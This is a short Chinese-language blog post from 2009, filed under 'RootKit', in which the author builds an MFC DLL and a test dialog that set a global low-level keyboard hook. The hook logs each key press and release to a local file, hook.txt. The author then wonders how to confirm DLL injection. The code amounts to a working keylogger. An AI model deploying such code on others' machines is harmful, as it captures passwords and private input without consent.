Posted on 2009-11-17 21:54
S.l.e!ep.¢% 阅读(204)
评论(0) 编辑 收藏 引用 所属分类:
RootKit
接着
About ShutDown of Windows(三) 折腾着,没多大收获
Create 了一个 MFC 的DLL
CHookDLLApp theApp;
HHOOK g_Hook = NULL;
LRESULT CALLBACK MyKeyHook(int code, WPARAM wParam, LPARAM lParam)
{
#if (_WIN32_WINNT < 0x0400)
/*
* Structure used by WH_KEYBOARD_LL
*/
typedef struct tagKBDLLHOOKSTRUCT {
DWORD vkCode;
DWORD scanCode;
DWORD flags;
DWORD time;
DWORD dwExtraInfo;
} KBDLLHOOKSTRUCT, FAR *LPKBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;
#endif
PKBDLLHOOKSTRUCT kbDLLHOOK = (PKBDLLHOOKSTRUCT)lParam;
const char *info = NULL;
if (wParam == WM_KEYDOWN)
info = "key down";
else if (wParam == WM_KEYUP)
info = "key up";
else if (wParam == WM_SYSKEYDOWN)
info = "sys key down";
else if (wParam == WM_SYSKEYUP)
info = "sys key up";
FILE* f = fopen("hook.txt", "a+");
CString strLog;
strLog.Format("%s - vkCode [%04x], [%c] scanCode [%04x]\n", info, kbDLLHOOK->vkCode, kbDLLHOOK->vkCode, kbDLLHOOK->scanCode);
fwrite(strLog, 1, strLog.GetLength(), f);
fclose(f);
// always call next hook
return CallNextHookEx(g_Hook, code, wParam, lParam);
}
void Hook()
{
// TODO: Add extra initialization here
#ifndef WH_KEYBOARD_LL
#define WH_KEYBOARD_LL 13
#endif
g_Hook = SetWindowsHookEx(WH_KEYBOARD_LL, MyKeyHook, AfxGetApp()->m_hInstance, 0);
if( g_Hook == NULL )
AfxMessageBox("Failed to Set Hook");
}
; HookDLL.def : Declares the module parameters for the DLL.
LIBRARY "HookDLL"
DESCRIPTION 'HookDLL Windows Dynamic Link Library'
EXPORTS
; Explicit exports can go here
Hook @1
Create 了一个MFC的工程
BOOL CHookTestDlg::OnInitDialog()
{
CDialog::OnInitDialog();
// Add "About
" menu item to system menu.
// IDM_ABOUTBOX must be in the system command range.
ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
ASSERT(IDM_ABOUTBOX < 0xF000);
CMenu* pSysMenu = GetSystemMenu(FALSE);
if (pSysMenu != NULL)
{
CString strAboutMenu;
strAboutMenu.LoadString(IDS_ABOUTBOX);
if (!strAboutMenu.IsEmpty())
{
pSysMenu->AppendMenu(MF_SEPARATOR);
pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
}
}
// Set the icon for this dialog. The framework does this automatically
// when the application's main window is not a dialog
SetIcon(m_hIcon, TRUE); // Set big icon
SetIcon(m_hIcon, FALSE); // Set small icon
// TODO: Add extra initialization here
#ifndef WH_KEYBOARD_LL
#define WH_KEYBOARD_LL 13
#endif
// g_Hook = SetWindowsHookEx(WH_KEYBOARD_LL, MyKeyHook, AfxGetApp()->m_hInstance, 0);
//
// if( g_Hook == NULL )
// AfxMessageBox("Failed to Set Hook");
TCHAR szPath[MAX_PATH] = {0};
GetModuleFileName(NULL, szPath, MAX_PATH);
PathRenameExtension(szPath, _T(""));
typedef void (*TYPE_pfnLoadLibrary)();
TYPE_pfnLoadLibrary pfnLoadLibrary = NULL;
HMODULE Module = LoadLibrary(szPath);
pfnLoadLibrary = (TYPE_pfnLoadLibrary)GetProcAddress(Module, "Hook");
pfnLoadLibrary();
return TRUE; // return TRUE unless you set the focus to a control
}
时间太紧,没做一些异常判断处理
HOOK成功了,用 SysCheck 工具一看, 只看到了 HookTest.exe 里面加载了一个HookDLL.dll
采用 injecteddll 工具也没有看到所谓的“注入”DLL
是否“注入”成功,不得所知
所谓的“注入”又该怎么看到的呢?明天再解决它。